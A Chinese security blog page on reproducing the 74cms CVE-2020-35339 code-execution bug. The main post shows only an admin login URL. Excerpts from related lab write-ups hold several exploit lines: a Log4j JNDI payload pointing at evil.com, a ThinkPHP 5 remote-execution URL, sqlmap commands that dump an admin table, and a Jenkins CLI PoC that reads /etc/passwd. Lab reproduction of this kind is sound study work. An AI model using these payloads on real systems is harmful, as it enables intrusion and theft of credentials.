漏洞复现-骑士cms任意代码执行(CVE-2020-35339)
发表于|更新于|Web安全
|浏览量:
环境
- 先扫一下后台
1 | http://192.168.169.233:26889/index.php?m=Admin&c=index&a=login |
漏洞点
文章作者: putdown
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Putdownd’s Blog!
相关推荐
2023-02-06
漏洞复现-Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
环境搭建: vulhubApache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)中文版本(Chinese version) Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考链接: https://logging.apache.org/log4j/2.x/security.html https://www.lunasec.io/docs/blog/log4j-zero-day/ https://xz.aliyun.com/t/10649 漏洞环境Apache Log4j2 不是一个特定的Web服务,而仅仅是一个第三方库,我们可以通过找到一些使用了这个库的应用来复现这个漏洞,比如Apache Solr。 执行如下命令启动一个Apache Solr 8.11.0,其依赖了Log4j 2.14.1: 1d...
2023-10-21
Jenkins未授权访问到Getshell
实验环境 ubuntu20 虚拟机 安装 Jenkins安装Java12sudo apt updatesudo apt install openjdk-11-jdk 开始安装Jenkins 使用下面的wget命令,导入 Jenkins 软件源的 GPG keys: 1wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add - 下一步,添加软件源到系统中: 1sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' 一旦 Jenkins 软件源被启用,升级apt软件包列表,并且安装最新版本的 Jenkins: 12sudo apt updatesudo apt install jenkins Ubuntu安装Jenkins报错解决 1234567891011121314正在读取软件包列...
2022-09-30
HMS v1.0 appointment.php editid
概述 面试遇到一个靶场,复盘一下 测试环境: vulfocus在线靶场 http://vulfocus.io/ 面试时的测试经过: bp+xray kali 扫目录 经面试官提示 sql 注入, 因为此前有类似的界面就直接再下图进行了post注入(注入点不在这) 后在登录界面发现post注入 放到sqlmap进行注入,时间结束,没看到结果 重新测试 面试结束,在xray的报告中发现该靶场的一些信息,重新进行测试 靶场信息,面试的时候只知道ip awvs 扫描结果,和靶场描述一致 SQL注入 知道主要是sql注入,其他功能就先放弃测试 开测 接着没测完的接着跑 保存http 开跑 1sqlmap -r hms.txt --level 4 --dbs hms 1sqlmap -r hms.txt --level 4 -D hms --tables 看admin 1sqlmap -r hms.txt --level 4 -D hms -T admin --columns 看字段 1qlmap -r hms.txt...
2023-02-07
漏洞复现-ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
环境: vulhubThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 参考链接: http://www.thinkphp.cn/topic/60400.html http://www.thinkphp.cn/topic/60390.html https://xz.aliyun.com/t/3570 漏洞环境运行ThinkPHP 5.0.20版本: 环境启动 网页 复现123http://your-ip:8080/index.php?s=/Index/ hink\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1即可执行phpinfo: 漏洞成功利用 1http://192.168.169.233:8080/index.php?s=/Ind...
2023-02-06
漏洞复现-Apache Shiro 认证绕过漏洞(CVE-2020-1957)
环境: vulhubApache Shiro 认证绕过漏洞(CVE-2020-1957)Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造..;这样的跳转,可以绕过Shiro中对目录的权限限制。 参考链接: https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139 https://xz.aliyun.com/t/8281 https://blog.spoock.com/2020/05/09/cve-2020-1957/ 环境搭建执行如下命令启动一个搭载Spring 2.2.2与Shiro 1.5.1的应用: 1docker-compose up -d 环境启动后,访问http://your-ip:8080即可查...
2024-01-27
Jenkins 任意文件读取漏洞-CVE-2024-23897
Jenkins 任意文件读取漏洞-CVE-2024-23897工具获取 官方描述 在jenkins的链接后面加上 /jnlpJars/jenkins-cli.jar 即可获取 1http://192.168.72.129:8080//jnlpJars/jenkins-cli.jar POC1java -jar jenkins-cli.jar -s http://192.168.72.129:8080 connect-node "@/etc/passwd" 如何RCE 需要使用 jenkins解密工具 1https://github.com/hoto/jenkins-credentials-decryptor 找到 jenkins安装路径找到这三个文件解密会得到账号密码进入后台,即可执行命令 执行命令可以参考 : https://blog.putdown.top/archives/3580484b-3ef1-4194-9d48-bcd4fdf01f92